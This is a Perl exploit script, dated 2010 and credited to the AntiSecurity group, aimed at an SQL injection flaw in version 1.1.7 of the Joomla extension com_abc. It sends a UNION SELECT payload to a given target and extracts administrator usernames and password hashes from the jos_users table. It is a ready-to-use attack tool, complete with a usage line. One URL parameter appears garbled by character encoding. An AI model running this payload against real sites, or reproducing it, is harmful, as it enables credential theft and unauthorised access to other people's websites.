#!/usr/bin/perl
#***********************************************************************#
# #
# [o] ABC Joomla Extension SQL Injection Exploit #
# Software : com_abc version 1.1.7 #
# Vendor : http://www.airiny.com/ #
# Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] #
# Contact : public[at]antisecurity[dot]org #
# Home : http://antisecurity.org/ #
# #
# [o] Usage #
# root@evilc0de:~# perl abc.pl www.target.com #
# #
# [o] Greetz #
# Angela Zhang stardustmemory aJe martfella pizzyroot Genex #
# H312Y yooogy mousekill }^-^{ noname matthews wishnusakti #
# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 #
# #
# [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia #
# #
#***********************************************************************#
use HTTP::Request;
use LWP::UserAgent;
my $target = $ARGV[0];
my $file_vuln = '/index.php?option=com_abc&view=abc&letter=AS§ionid=';
my $sql_query = '-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--';
print "\n[x]===============================================[x]\n";
print "[x] ABC Joomla Extension SQL Injection Exploit [x]\n";
print "[x] [C]oded By AntiSecurity [x]\n";
print "[x]===============================================[x]\n\n";
my $exploit = "http://".$target.$file_vuln.$sql_query;
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/:(.*):(.*):/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n"; }
